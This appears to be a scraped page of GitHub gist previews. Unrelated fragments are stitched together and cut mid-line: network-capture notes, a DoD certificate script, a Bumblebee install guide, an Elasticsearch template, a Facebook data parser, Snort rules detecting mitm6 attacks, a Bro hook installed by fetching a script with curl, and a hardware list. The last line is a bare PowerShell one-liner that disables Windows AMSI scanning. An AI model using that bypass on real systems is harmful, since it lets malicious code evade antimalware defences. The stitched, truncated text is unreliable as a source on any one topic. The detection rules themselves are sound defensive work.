I recently ran into an issue while replaying some network traffic that was captured as pcap-ng and I wanted to share what I had to do to get things working.
The issue is that the packet capture contained traffic from two NICs, which is supported by pcap-ng, but not pcap. The commands here filter by interface and then convert the individual interface captures into regular pcap.
| #!/bin/bash | |
| set -eu -o pipefail | |
| export CERT_URL='https://dl.dod.cyber.mil/wp-content/uploads/pki-pke/zip/unclass-certificates_pkcs7_DoD.zip' | |
| # Download & Extract DoD root certificates | |
| cd ~/Downloads/ || exit 1 | |
| /usr/bin/curl -LOJ "${CERT_URL}" |
This is a Bumblebee installation and configuration procedure. It runs on a fully updated Kali Linux 2018.2. To avoid possible errors, I started with a new installation. You must have a laptop computer with a Nvidia graphics card that supports Optimus technology.
On Windows, Nvidia drivers allow Optimus technology to be exploited: when you are not using graphic resources that are too greedy, it is the CPU's 3D chipset that performs the calculations leaving the graphics card at rest. When you start a game, 3D calculations are then supported by the GPU. Among other things, this reduces electricity consumption and reduces the ventilation of your laptop. On GNU/Linux, it's more complicated. Nvidia's proprietary drivers do not support Optimus on this operating system. You must therefore use a third party software to have the same behavior as on Windows.
The Bumblebee server disables the discrete video card if no client is detected (if power management is enabled which i
| { | |
| "order": 10, | |
| "index_patterns": [ | |
| "bro-diag-*" | |
| ], | |
| "mappings": { | |
| "_doc": { | |
| "properties": { | |
| "acks": { | |
| "type": "long" |
| #! /usr/bin/env ruby | |
| # NOTE: Requires Ruby 2.1 or greater. | |
| # This script can be used to parse and dump the information from | |
| # the 'html/contact_info.htm' file in a Facebook user data ZIP download. | |
| # | |
| # It prints all cell phone call + SMS message + MMS records, plus a summary of each. | |
| # | |
| # It also dumps all of the records into CSV files inside a 'CSV' folder, that is created |
| # Snort & Suricata signatures for: | |
| # https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6 | |
| alert udp fe80::/12 [546,547] -> fe80::/12 [546,547] (msg:"FOX-SRT - Policy - DHCPv6 advertise"; content:"|02|"; offset:48; depth:1; reference:url,blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/; threshold:type limit, track by_src, count 1, seconds 3600; classtype:policy-violation; sid:21002327; rev:2;) | |
| alert udp ::/0 53 -> any any (msg:"FOX-SRT - Suspicious - WPAD DNS reponse over IPv6"; byte_test:1,&,0x7F,2; byte_test:2,>,0,6; content:"|00 04|wpad"; nocase; fast_pattern; threshold: type limit, track by_src, count 1, seconds 1800; reference:url,blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/; classtype:attempted-admin; priority:1; sid:21002330; rev:1;) |
I'm going through Offensive Security's "Pentesting With Kali" (PWK) course, and I added this hook to my Kali VM so that Bro would record everything going over the wire. I wanted to do this so I could analyze what my traffic would show up like using various tools.
Of course, you could use this on other systems using NetworkManager. And if you're pentesting, but not going over a VPN, just change the interface name in the script and the instructions. To add this to Kali for the OpenVPN connection, you need to do the following:
apt-get install bro broctl
sed -i 's/eth0/tap0/' /etc/bro/node.cfg
curl 'https://gist.githubusercontent.com/dcode/214fe616b1c98cd5665c99ad34a78893/raw/8d116140bb567c5990e378ab01973399719bb62a/nm-broctl.sh' | tee /etc/NetworkManager/dispatcher.d/broctl.sh
chmod +x /etc/NetworkManager/dispatcher.d/broctl.sh
Below is the hardware I use for development and home use of my ROCK sensor. It’s an extremely powerful system in a small form factor, under $1000. The most important aspects to me were that I wanted IPMI for baremetal remote management, dual Intel NICs, quiet, and relatively low-power. I sit by this thing and work everyday and don’t want to wear hearing protection while I write code.
The prices reflect what I paid for them in March 2016. No doubt the prices will have changed and newer, better stuff is probably available. Things like RAM and SSDs go on sale all the time, so look for that if you’re a bargain shopper.
Antec ISK 300-150 Black Mini-ITX Desktop Computer Case 150 Watt Power Supply - $70.70
https://www.amazon.com/gp/product/B015YPB1NK/ref=oh_aui_detailpage_o04_s00?ie=UTF8&psc=1[CRUCIAL TECHNOLOGY 16GBx2 32GB Kit, DDR4 2133 MT/s DIMM 288 (CT2K16G4D
| [Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').GetValue($null),0x41414141) |
